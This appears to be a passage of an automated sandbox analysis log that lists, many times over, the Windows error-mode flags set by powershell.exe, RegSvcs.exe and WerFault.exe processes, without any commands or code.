Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
